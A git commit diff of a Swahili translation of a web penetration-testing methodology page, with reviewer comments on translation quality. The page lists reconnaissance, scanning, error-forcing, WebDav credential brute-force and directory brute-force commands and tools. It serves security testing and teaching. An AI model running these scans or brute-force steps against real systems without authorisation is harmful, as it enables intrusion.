Translated ['src/pentesting-web/command-injection.md', 'src/network-serv

This commit is contained in:
Translator 2025-08-28 14:24:10 +00:00
parent 7ac2766567
commit ddaec77e19
5 changed files with 300 additions and 181 deletions


@ -432,6 +432,7 @@
- [H2 - Java SQL database](network-services-pentesting/pentesting-web/h2-java-sql-database.md)
- [IIS - Internet Information Services](network-services-pentesting/pentesting-web/iis-internet-information-services.md)
- [ImageMagick Security](network-services-pentesting/pentesting-web/imagemagick-security.md)
- [Ispconfig](network-services-pentesting/pentesting-web/ispconfig.md)
- [JBOSS](network-services-pentesting/pentesting-web/jboss.md)
- [Jira & Confluence](network-services-pentesting/pentesting-web/jira.md)
- [Joomla](network-services-pentesting/pentesting-web/joomla.md)
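Review bot: the new SUMMARY entry's link text `Ispconfig` does not match the `ISPConfig` capitalization used for the same page in the tricks list added later in this commit (`- [**ISPConfig**](ispconfig.md)`); use `ISPConfig` in both places so the two entries stay consistent.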


@ -2,11 +2,11 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Info
## Habari za Msingi
Huduma ya wavuti ni huduma **ya kawaida na pana zaidi** na aina nyingi za **vulnerabilities tofauti** zipo.
Huduma ya wavuti ni huduma ya **kawaida zaidi na yenye wigo mpana**, na kuna **aina nyingi tofauti za udhaifu**.
**Port ya default:** 80 (HTTP), 443(HTTPS)
**Bandari ya chaguo-msingi:** 80 (HTTP), 443(HTTPS)
```bash
PORT STATE SERVICE
80/tcp open http
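Review bot: `443(HTTPS)` in the retranslated default-port line still lacks the space before the parenthesis that `80 (HTTP)` has; since the line is being rewritten anyway, make it `443 (HTTPS)`.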
@ -26,46 +26,46 @@ web-api-pentesting.md
## Muhtasari wa Mbinu
> Katika mbinu hii tunaenda kudhani kwamba unataka kushambulia kikoa (au subdomain) na tu hicho. Hivyo, unapaswa kutumia mbinu hii kwa kila kikoa, subdomain au IP iliyogunduliwa yenye seva ya wavuti isiyojulikana ndani ya upeo.
> Katika mbinu hii tutadhania kuwa unamshambulia domain (au subdomain) moja tu. Kwa hivyo, unapaswa kutumia mbinu hii kwa kila domain, subdomain au IP iliyogunduliwa ambayo ina web server isiyothibitishwa ndani ya upeo.
- [ ] Anza kwa **kutambua** **teknolojia** zinazotumiwa na seva ya wavuti. Tafuta **hila** za kukumbuka wakati wa mtihani mzima ikiwa utaweza kutambua teknolojia hiyo kwa mafanikio.
- [ ] Je, kuna **udhaifu** wowote unaojulikana wa toleo la teknolojia hiyo?
- [ ] Unatumia **teknolojia maarufu** yoyote? Je, kuna **hila** yoyote ya manufaa ya kupata taarifa zaidi?
- [ ] Je, kuna **scanner maalum** ya kukimbia (kama wpscan)?
- [ ] Anzisha **scanners za matumizi ya jumla**. Hujui kama wataweza kupata kitu au kama wataweza kupata taarifa za kuvutia.
- [ ] Anza na **ukaguzi wa awali**: **robots**, **sitemap**, **404** makosa na **SSL/TLS scan** (ikiwa HTTPS).
- [ ] Anza **kupeleleza** ukurasa wa wavuti: Ni wakati wa **kupata** faili, folda na **parameta** zote zinazotumika. Pia, angalia kwa **matokeo maalum**.
- [ ] _Kumbuka kwamba kila wakati directory mpya inagunduliwa wakati wa brute-forcing au kupeleleza, inapaswa kupelelezwa._
- [ ] **Brute-Forcing ya Directory**: Jaribu kujaribu nguvu zote za folda zilizogunduliwa kutafuta **faili** na **directories** mpya.
- [ ] _Kumbuka kwamba kila wakati directory mpya inagunduliwa wakati wa brute-forcing au kupeleleza, inapaswa kujaribiwa kwa nguvu._
- [ ] **Ukaguzi wa Nakala**: Jaribu kuona kama unaweza kupata **nakala** za **faili zilizogunduliwa** kwa kuongeza nyongeza za kawaida za nakala.
- [ ] **Brute-Force parameta**: Jaribu **kupata parameta zilizofichwa**.
- [ ] Mara tu unapokuwa umeshatambua **endpoints** zote zinazokubali **ingizo la mtumiaji**, angalia aina zote za **udhaifu** zinazohusiana na hiyo.
- [ ] Anza kwa **kutambua** **teknolojia** zinazotumiwa na web server. Tafuta **mbinu** za kuzingatia wakati wa mtihani wa baadaye ikiwa utaweza kutambua tech kwa ufanisi.
- [ ] Kuna **known vulnerability** yoyote ya toleo la teknolojia?
- [ ] Unatumia **well known tech** yoyote? Kuna **useful trick** yoyote ya kupata taarifa zaidi?
- [ ] Kuna **specialised scanner** ya kuendesha (kama wpscan)?
- [ ] Anzisha **general purposes scanners**. Hujui kama zitatokea kitu au kama zitatoka taarifa za kuvutia.
- [ ] Anza na **initial checks**: **robots**, **sitemap**, **404** error na **SSL/TLS scan** (ikiwa HTTPS).
- [ ] Anza **spidering** ukurasa wa wavuti: Ni wakati wa **kutafuta** faili zote zinazowezekana, **folders** na **parameters being used.** Pia, angalia kwa **special findings**.
- [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be spidered._
- [ ] **Directory Brute-Forcing**: Jaribu ku-brute force folda zote zilizogunduliwa ukitafuta faili mpya na directory mpya.
- [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._
- [ ] **Backups checking**: Jaribu kuona kama unaweza kupata **backups** za **discovered files** ukiongeza extensions za kawaida za backup.
- [ ] **Brute-Force parameters**: Jaribu **kutafuta hidden parameters**.
- [ ] Mara utakapokuwa ume**identified** endpoints zote zinazowezekana zinazokubali **user input**, angalia aina zote za **vulnerabilities** zinazohusiana nazo.
- [ ] [Fuata orodha hii ya ukaguzi](../../pentesting-web/web-vulnerabilities-methodology.md)
## Toleo la Seva (Lina Udhihirisho?)
## Toleo la Server (Je, lina udhaifu?)
### Tambua
Angalia kama kuna **udhaifu unaojulikana** kwa **toleo** la seva linalotumika.\
**Vichwa vya HTTP na vidakuzi vya jibu** vinaweza kuwa na manufaa sana katika **kutambua** **teknolojia** na/au **toleo** linalotumika. **Nmap scan** inaweza kutambua toleo la seva, lakini pia inaweza kuwa na manufaa kutumia zana [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech)au [**https://builtwith.com/**](https://builtwith.com)**:**
Angalia kama kuna **known vulnerabilities** kwa server **toleo** linaloendesha.\
**HTTP headers and cookies of the response** zinaweza kuwa muhimu sana kutambua **teknolojia** na/au **toleo** linalotumika. **Nmap scan** inaweza kubaini server toleo, lakini pia zana [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech)au [**https://builtwith.com/**](https://builtwith.com)**:**
```bash
whatweb -a 1 <URL> #Stealthy
whatweb -a 3 <URL> #Aggresive
webtech -u <URL>
webanalyze -host https://google.com -crawl 2
```
Search **for** [**vulnerabilities of the web application** **version**](../../generic-hacking/search-exploits.md)
Tafuta **for** [**vulnerabilities of the web application** **version**](../../generic-hacking/search-exploits.md)
### **Check if any WAF**
### **Angalia kama kuna WAF**
- [**https://github.com/EnableSecurity/wafw00f**](https://github.com/EnableSecurity/wafw00f)
- [**https://github.com/Ekultek/WhatWaf.git**](https://github.com/Ekultek/WhatWaf.git)
- [**https://nmap.org/nsedoc/scripts/http-waf-detect.html**](https://nmap.org/nsedoc/scripts/http-waf-detect.html)
### Web tech tricks
### Mbinu za teknolojia za wavuti
Baadhi ya **tricks** za **finding vulnerabilities** katika **technologies** maarufu zinazotumika:
Baadhi ya **tricks** za **finding vulnerabilities** katika teknolojia mbalimbali zinazojulikana zinazotumika:
- [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md)
- [**Apache**](apache.md)
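Review bot: the two italic reminder bullets (`_Note that anytime a new directory is discovered ... it should be spidered._` and `... it should be Brute-Forced._`) are left in English while the lines they replace had them in Swahili, and the rest of the checklist now mixes untranslated English phrases (`known vulnerability`, `general purposes scanners`, `special findings`) into Swahili sentences; either translate those bullets or keep the previous Swahili wording so the checklist reads in one language. The phrase `Nmap scan inaweza kubaini server toleo` also inverts the Swahili noun order; `toleo la server` reads naturally.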
@ -78,6 +78,7 @@ Baadhi ya **tricks** za **finding vulnerabilities** katika **technologies** maar
- [**Golang**](golang.md)
- [**GraphQL**](graphql.md)
- [**H2 - Java SQL database**](h2-java-sql-database.md)
- [**ISPConfig**](ispconfig.md)
- [**IIS tricks**](iis-internet-information-services.md)
- [**Microsoft SharePoint**](microsoft-sharepoint.md)
- [**JBOSS**](jboss.md)
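Review bot: the new `ISPConfig` entry is inserted between `H2` and `IIS tricks`, whereas the SUMMARY hunk in this same commit places `Ispconfig` after `ImageMagick` and before `JBOSS`; placing it after `IIS tricks` here would match that order and keep the I-entries alphabetical.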
@ -100,28 +101,28 @@ Baadhi ya **tricks** za **finding vulnerabilities** katika **technologies** maar
- [**Wordpress**](wordpress.md)
- [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/index.html)
_Kumbuka kwamba **domain** hiyo hiyo inaweza kuwa inatumia **technologies** tofauti katika **ports**, **folders** na **subdomains**._\
Ikiwa programu ya wavuti inatumia **tech/platform** maarufu iliyoorodheshwa hapo juu au **zingine yoyote**, usisahau **kutafuta mtandaoni** tricks mpya (na unijulishe!).
_Kumbuka kwamba the **same domain** inaweza kutumia **different technologies** katika tofauti **ports**, **folders** na **subdomains**._\
Kama web application inatumia **tech/platform listed before** au **any other**, usisahau **kutafuta mtandaoni** mbinu mpya (na nijulishe!).
### Source Code Review
### Mapitio ya Source Code
Ikiwa **source code** ya programu inapatikana katika **github**, mbali na kufanya **mtihani wa White box** wa programu hiyo kuna **maelezo** ambayo yanaweza kuwa **muhimu** kwa **Black-Box testing** ya sasa:
Ikiwa **source code** ya application inapatikana kwenye **github**, mbali na wewe kufanya mwenyewe **White box test** ya application, kuna **some information** ambazo zinaweza kuwa **useful** kwa **Black-Box testing** inayofanywa sasa:
- Je, kuna **Change-log au Readme au Version** file au chochote chenye **version info accessible** kupitia wavuti?
- Je, **credentials** zimehifadhiwaje na wapi? Je, kuna **file** (inayopatikana?) yenye credentials (majina ya watumiaji au nywila)?
- Je, **nywila** ziko katika **plain text**, **encrypted** au ni **hashing algorithm** gani inatumika?
- Je, inatumia **master key** yoyote kwa ajili ya kuandika kitu? Ni **algorithm** gani inatumika?
- Je, unaweza **kufikia yoyote ya hizi files** kwa kutumia udhaifu wowote?
- Je, kuna **maelezo ya kuvutia katika github** (masuala yaliyotatuliwa na yasiyotatuliwa) **issues**? Au katika **commit history** (labda **nywila iliyoingizwa ndani ya commit ya zamani**)?
- Je, kuna **Change-log or Readme or Version** file au kitu chochote chenye **version info accessible** via web?
- Je, **credentials** zimehifadhiwa vipi na wapi? Kuna (inayopatikana?) **file** yenye credentials (usernames au passwords)?
- Je, **passwords** ziko kwa **plain text**, **encrypted** au ni gani **hashing algorithm** inayotumika?
- Je, inatumia **master key** kwa ku-encrypt kitu? Ni **algorithm** gani inayotumika?
- Je, unaweza **access any of these files** kwa kutumia vulnerability fulani?
- Je, kuna **interesting information in the github** (solved and not solved) **issues**? Au katika **commit history** (labda some **password introduced inside an old commit**)?
{{#ref}}
code-review-tools.md
{{#endref}}
### Automatic scanners
### Skana za otomatiki
#### General purpose automatic scanners
#### Skana za otomatiki za madhumuni ya jumla
```bash
nikto -h <URL>
whatweb -a 4 <URL>
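Review bot: the retranslated note `Kumbuka kwamba the **same domain** inaweza kutumia **different technologies** katika tofauti **ports** ...` leaves a stray English article `the` in the Swahili sentence and puts the adjective before the noun (`tofauti ports`), where Swahili places it after (`ports tofauti`); the wording it replaces (`domain hiyo hiyo inaweza kuwa inatumia technologies tofauti katika ports, folders na subdomains`) was cleaner. Likewise `au ni gani hashing algorithm inayotumika` reads better as `au ni hashing algorithm gani inayotumika`.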
@ -133,12 +134,12 @@ nuclei -ut && nuclei -target <URL>
# https://github.com/ignis-sec/puff (client side vulns fuzzer)
node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi2rVUN/?query=FUZZ"
```
#### CMS scanners
#### Vichunguzi vya CMS
Ikiwa CMS inatumika usisahau **kufanya skana**, labda kitu cha kuvutia kitatokea:
Ikiwa CMS inatumiwa usisahau **kuendesha skana**, labda utapata kitu kitamu:
[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/index.html)**, Railo, Axis2, Glassfish**\
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/index.html), **Joomla**, **vBulletin** tovuti za masuala ya Usalama. (GUI)\
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/index.html), **Joomla**, **vBulletin** tovuti kwa masuala ya usalama. (GUI)\
[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/index.html)**, PrestaShop, Opencart**\
**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/index.html) **au** [**(M)oodle**](moodle.md)\
[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal/index.html)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md)
@ -148,45 +149,45 @@ wpscan --force update -e --url <URL>
joomscan --ec -u <URL>
joomlavs.rb #https://github.com/rastating/joomlavs
```
> Katika hatua hii unapaswa kuwa na taarifa fulani kuhusu seva ya wavuti inayotumiwa na mteja (ikiwa kuna data yoyote iliyotolewa) na mbinu fulani za kukumbuka wakati wa mtihani. Ikiwa una bahati umepata hata CMS na kuendesha skana.
> Kwa hatua hii unapaswa tayari kuwa na baadhi ya taarifa za web server inayotumiwa na mteja (ikiwa data yoyote imetolewa) na baadhi ya mbinu za kuzingatia wakati wa mtihani. Ikiwa una bahati umebaini hata CMS na kukimbia scanner.
## Ugunduzi wa Programu za Wavuti Hatua kwa Hatua
## Hatua kwa hatua za ugunduzi wa Web Application
> Kutoka hapa tutaanza kuingiliana na programu ya wavuti.
> Kuanzia sasa tutaanza kuingiliana na web application.
### Ukaguzi wa Awali
### Uchunguzi wa awali
**Kurasa za Kawaida zenye taarifa za kuvutia:**
**Kurasa za default zenye taarifa za kuvutia:**
- /robots.txt
- /sitemap.xml
- /crossdomain.xml
- /clientaccesspolicy.xml
- /.well-known/
- Angalia pia maoni katika kurasa kuu na za sekondari.
- Angalia pia maoni kwenye kurasa kuu na za pili.
**Kusababisha makosa**
**Kulazimisha makosa**
Seva za wavuti zinaweza **kufanya kazi kwa njia isiyo ya kawaida** wakati data ya ajabu inatumwa kwao. Hii inaweza kufungua **vulnerabilities** au **kufichua taarifa nyeti**.
Web servers zinaweza **kutenda kinyume cha kawaida** wakati data ya kushangaza inapotumwa kwao. Hii inaweza kufungua **vulnerabilities** au kusababisha **disclosure** ya taarifa nyeti.
- Fikia **kurasa za uwongo** kama /whatever_fake.php (.aspx,.html,.n.k)
- **Ongeza "\[]", "]]", na "\[\["** katika **maadili ya cookie** na **maadili ya parameter** ili kuunda makosa
- Tengeneza kosa kwa kutoa input kama **`/~randomthing/%s`** kwenye **mwisho** wa **URL**
- Jaribu **HTTP Verbs tofauti** kama PATCH, DEBUG au makosa kama FAKE
- Access **fake pages** like /whatever_fake.php (.aspx,.html,.etc)
- **Add "\[]", "]]", and "\[\["** in **cookie values** and **parameter** values to create errors
- Generate error by giving input as **`/~randomthing/%s`** at the **end** of **URL**
- Try **different HTTP Verbs** like PATCH, DEBUG or wrong like FAKE
#### **Angalia kama unaweza kupakia faili (**[**PUT verb, WebDav**](put-method-webdav.md)**)**
#### **Check if you can upload files (**[**PUT verb, WebDav**](put-method-webdav.md)**)**
Ikiwa unapata kuwa **WebDav** ime **wezeshwa** lakini huna ruhusa ya kutosha kwa **kupakia faili** kwenye folda ya mizizi jaribu:
If you find that **WebDav** is **enabled** but you don't have enough permissions for **uploading files** in the root folder try to:
- **Brute Force** akreditif
- **Pakia faili** kupitia WebDav kwenye **sehemu** za **folda zilizopatikana** ndani ya ukurasa wa wavuti. Unaweza kuwa na ruhusa za kupakia faili katika folda nyingine.
- **Brute Force** credentials
- **Upload files** via WebDav to the **rest** of **found folders** inside the web page. You may have permissions to upload files in other folders.
### **Vulnerabilities za SSL/TLS**
### **SSL/TLS vulnerabilites**
- Ikiwa programu **haiwalazimishi watumiaji kutumia HTTPS** katika sehemu yoyote, basi ni **vulnerable to MitM**
- Ikiwa programu inatumia **kutuma data nyeti (nywila) kwa kutumia HTTP**. Basi ni vulnerability kubwa.
- If the application **isn't forcing the user of HTTPS** in any part, then it's **vulnerable to MitM**
- If the application is **sending sensitive data (passwords) using HTTP**. Then it's a high vulnerability.
Tumia [**testssl.sh**](https://github.com/drwetter/testssl.sh) kuangalia **vulnerabilities** (Katika programu za Bug Bounty labda aina hizi za vulnerabilities hazitakubaliwa) na tumia [**a2sv** ](https://github.com/hahwul/a2sv)kuangalia tena vulnerabilities:
Use [**testssl.sh**](https://github.com/drwetter/testssl.sh) to checks for **vulnerabilities** (In Bug Bounty programs probably these kind of vulnerabilities won't be accepted) and use [**a2sv** ](https://github.com/hahwul/a2sv)to recheck the vulnerabilities:
```bash
./testssl.sh [--htmlfile] 10.10.10.10:443
#Use the --htmlfile to save the output inside an htmlfile also
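Review bot: this hunk replaces already-translated Swahili bullets with the English source text (the fake-pages/error-forcing list, the WebDav upload heading and bullets, the SSL/TLS heading, the MitM bullets and the testssl.sh paragraph), so a translation commit is effectively un-translating these sections; restore the previous Swahili lines or retranslate them. The English copies also carry the source typos `vulnerabilites` and `isn't forcing the user of HTTPS` (presumably `the use of HTTPS`), which the Swahili lines did not have.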
@ -195,60 +196,60 @@ Tumia [**testssl.sh**](https://github.com/drwetter/testssl.sh) kuangalia **vulne
sslscan <host:port>
sslyze --regular <ip:port>
```
Habari kuhusu SSL/TLS udhaifu:
Information about SSL/TLS vulnerabilities:
- [https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/](https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/)
- [https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/](https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/)
### Spidering
Zindua aina fulani ya **spider** ndani ya wavuti. Lengo la spider ni **kupata njia nyingi kadri iwezekanavyo** kutoka kwa programu iliyojaribiwa. Kwa hivyo, kuvinjari wavuti na vyanzo vya nje vinapaswa kutumika ili kupata njia halali nyingi kadri iwezekanavyo.
Anzisha aina fulani ya **spider** ndani ya wavuti. Lengo la spider ni **kupata njia nyingi iwezekanavyo** kutoka kwa application inayojaribiwa. Kwa hiyo, web crawling na vyanzo vya nje vinapaswa kutumika ili kupata njia nyingi halali iwezekanavyo.
- [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder katika faili za JS na vyanzo vya nje (Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com).
- [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spider, na LinkFider kwa faili za JS na Archive.org kama chanzo cha nje.
- [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spider, pia inaonyesha "faili za juicy".
- [**evine** ](https://github.com/saeeddhqan/evine)(go): Interactive CLI HTML spider. Pia inatafuta katika Archive.org
- [**meg**](https://github.com/tomnomnom/meg) (go): Chombo hiki si spider lakini kinaweza kuwa na manufaa. Unaweza tu kuashiria faili yenye mwenyeji na faili yenye njia na meg itachukua kila njia kwenye kila mwenyeji na kuhifadhi jibu.
- [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spider yenye uwezo wa kuunda JS. Hata hivyo, inaonekana haijatunzwa, toleo lililotengenezwa awali ni la zamani na msimbo wa sasa haujajitengeneza.
- [**gau**](https://github.com/lc/gau) (go): HTML spider inayotumia watoa huduma wa nje (wayback, otx, commoncrawl)
- [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): Hii ni script itakayopata URLs zenye parameta na kuziorodhesha.
- [**galer**](https://github.com/dwisiswant0/galer) (go): HTML spider yenye uwezo wa kuunda JS.
- [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML spider, yenye uwezo wa kuboresha JS inayoweza kutafuta njia mpya katika faili za JS. Inaweza kuwa na manufaa pia kuangalia [JSScanner](https://github.com/dark-warlord14/JSScanner), ambayo ni wrapper ya LinkFinder.
- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): Kutolewa kwa mwisho katika chanzo cha HTML na faili za javascript zilizojumuishwa. Inafaida kwa wawindaji wa makosa, red teamers, infosec ninjas.
- [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): Script ya python 2.7 inayotumia Tornado na JSBeautifier kuchambua URLs zinazohusiana kutoka kwa faili za JavaScript. Inafaida kwa kugundua maombi ya AJAX kwa urahisi. Inaonekana haijatunzwa.
- [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): Iwapo kuna faili (HTML) itatoa URLs kutoka kwake kwa kutumia kanuni nzuri za kawaida ili kupata na kutoa URLs zinazohusiana kutoka kwa faili mbaya (minify).
- [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, zana kadhaa): Kusanya habari za kuvutia kutoka kwa faili za JS kwa kutumia zana kadhaa.
- [**subjs**](https://github.com/lc/subjs) (go): Pata faili za JS.
- [**page-fetch**](https://github.com/detectify/page-fetch) (go): Pata ukurasa katika kivinjari kisichokuwa na kichwa na uchapishe URLs zote zilizopakiwa ili kupakia ukurasa.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Chombo cha kugundua maudhui kinachochanganya chaguzi kadhaa za zana zilizotangulia.
- [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): Kiendelezi cha Burp kutafuta njia na parameta katika faili za JS.
- [**Sourcemapper**](https://github.com/denandz/sourcemapper): Chombo ambacho kwa URL ya .js.map kitakupa msimbo wa JS ulioimarishwa.
- [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): Hii ni chombo kinachotumika kugundua mwisho kwa lengo fulani.
- [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Gundua viungo kutoka kwa mashine ya wayback (pia kupakua majibu katika wayback na kutafuta viungo zaidi).
- [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Vinjari (hata kwa kujaza fomu) na pia pata habari nyeti kwa kutumia regex maalum.
- [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite ni GUI ya hali ya juu ya usalama wa wavuti iliyoundwa kwa wataalamu wa usalama wa mtandao.
- [**jsluice**](https://github.com/BishopFox/jsluice) (go): Ni pakiti ya Go na [chombo cha amri](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) kwa kutolewa kwa URLs, njia, siri, na data nyingine za kuvutia kutoka kwa msimbo wa chanzo wa JavaScript.
- [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge ni kiendelezi rahisi cha **Burp Suite** kutolewa **parameta na mwisho** kutoka kwa ombi ili kuunda orodha ya maneno ya kawaida kwa fuzzing na orodha.
- [**katana**](https://github.com/projectdiscovery/katana) (go): Chombo bora kwa hili.
- [**Crawley**](https://github.com/s0rg/crawley) (go): Chapisha kila kiungo kinachoweza kupatikana.
- [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder in JS files and external sources (Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com).
- [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spider, with LinkFider for JS files and Archive.org as external source.
- [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spider, also indicates "juicy files".
- [**evine** ](https://github.com/saeeddhqan/evine)(go): Interactive CLI HTML spider. It also searches in Archive.org
- [**meg**](https://github.com/tomnomnom/meg) (go): This tool isn't a spider but it can be useful. You can just indicate a file with hosts and a file with paths and meg will fetch each path on each host and save the response.
- [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spider with JS rendering capabilities. However, it looks like it's unmaintained, the precompiled version is old and the current code doesn't compile
- [**gau**](https://github.com/lc/gau) (go): HTML spider that uses external providers (wayback, otx, commoncrawl)
- [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): This script will find URLs with parameter and will list them.
- [**galer**](https://github.com/dwisiswant0/galer) (go): HTML spider with JS rendering capabilities.
- [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML spider, with JS beautify capabilities capable of search new paths in JS files. It could be worth it also take a look to [JSScanner](https://github.com/dark-warlord14/JSScanner), which is a wrapper of LinkFinder.
- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): To extract endpoints in both HTML source and embedded javascript files. Useful for bug hunters, red teamers, infosec ninjas.
- [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests. Looks like unmaintained.
- [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): Given a file (HTML) it will extract URLs from it using nifty regular expression to find and extract the relative URLs from ugly (minify) files.
- [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, several tools): Gather interesting information from JS files using several tools.
- [**subjs**](https://github.com/lc/subjs) (go): Find JS files.
- [**page-fetch**](https://github.com/detectify/page-fetch) (go): Load a page in a headless browser and print out all the urls loaded to load the page.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Content discovery tool mixing several options of the previous tools
- [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): A Burp extension to find path and params in JS files.
- [**Sourcemapper**](https://github.com/denandz/sourcemapper): A tool that given the .js.map URL will get you the beatified JS code
- [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): This is a tool used to discover endpoints for a given target.
- [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Discover links from the wayback machine (also downloading the responses in the wayback and looking for more links
- [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (even by filling forms) and also find sensitive info using specific regexes.
- [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is an advance multi-feature GUI web security Crawler/Spider designed for cyber security professionals.
- [**jsluice**](https://github.com/BishopFox/jsluice) (go): It's a Go package and [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) for extracting URLs, paths, secrets, and other interesting data from JavaScript source code.
- [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge is a simple **Burp Suite extension** to **extract the paramters and endpoints** from the request to create custom wordlist for fuzzing and enumeration.
- [**katana**](https://github.com/projectdiscovery/katana) (go): Awesome tool for this.
- [**Crawley**](https://github.com/s0rg/crawley) (go): Print every link it's able to find.
### Brute Force directories and files
Anza **brute-forcing** kutoka kwenye folda ya mzizi na uhakikishe unafanya brute-force **zote** **directories zilizopatikana** kwa kutumia **hii mbinu** na zote **directories zilizogunduliwa** na **Spidering** (unaweza kufanya brute-forcing hii **kikamilifu** na kuongeza mwanzoni mwa orodha ya maneno iliyotumika majina ya directories zilizopatikana).\
Zana:
Anza **brute-forcing** kutoka kwenye folda ya root na hakikisha unafanya **brute-force** kwa **direktori zote zilizopatikana** ukitumia **hii method** na direktorisi zote **zilizoonekana** kwa **Spidering** (unaweza kufanya brute-forcing **kikamilifu** na kuongeza mwanzoni mwa wordlist iliyotumika majina ya direktorisi zilizopatikana).\
Tools:
- **Dirb** / **Dirbuster** - Imejumuishwa katika Kali, **ya zamani** (na **pole**) lakini inafanya kazi. Inaruhusu vyeti vilivyojitiisha na utafutaji wa kurudiwa. Pole sana ikilinganishwa na chaguzi nyingine.
- [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: Haina ruhusa vyeti vilivyojitiisha lakini** inaruhusu utafutaji wa kurudiwa.
- [**Gobuster**](https://github.com/OJ/gobuster) (go): Inaruhusu vyeti vilivyojitiisha, **haina** **recursive** search.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Haraka, inasaidia utafutaji wa kurudiwa.**
- **Dirb** / **Dirbuster** - Included in Kali, **old** (and **slow**) but functional. Allow auto-signed certificates and recursive search. Too slow compared with th other options.
- [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: It doesn't allow auto-signed certificates but** allows recursive search.
- [**Gobuster**](https://github.com/OJ/gobuster) (go): It allows auto-signed certificates, it **doesn't** have **recursive** search.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Fast, supports recursive search.**
- [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ`
- [**ffuf** ](https://github.com/ffuf/ffuf)- Haraka: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`
- [**uro**](https://github.com/s0md3v/uro) (python): Hii si spider lakini ni chombo ambacho kwa orodha ya URLs zilizopatikana itafuta "URLs zilizojirudia".
- [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Kiendelezi cha Burp kuunda orodha ya directories kutoka kwa historia ya burp ya kurasa tofauti.
- [**TrashCompactor**](https://github.com/michael1026/trashcompactor): Ondoa URLs zenye kazi zilizojirudia (kulingana na uagizaji wa js).
- [**Chamaleon**](https://github.com/iustin24/chameleon): Inatumia wapalyzer kugundua teknolojia zinazotumika na kuchagua orodha za maneno za kutumia.
- [**ffuf** ](https://github.com/ffuf/ffuf)- Fast: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`
- [**uro**](https://github.com/s0md3v/uro) (python): This isn't a spider but a tool that given the list of found URLs will to delete "duplicated" URLs.
- [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Burp Extension to create a list of directories from the burp history of different pages
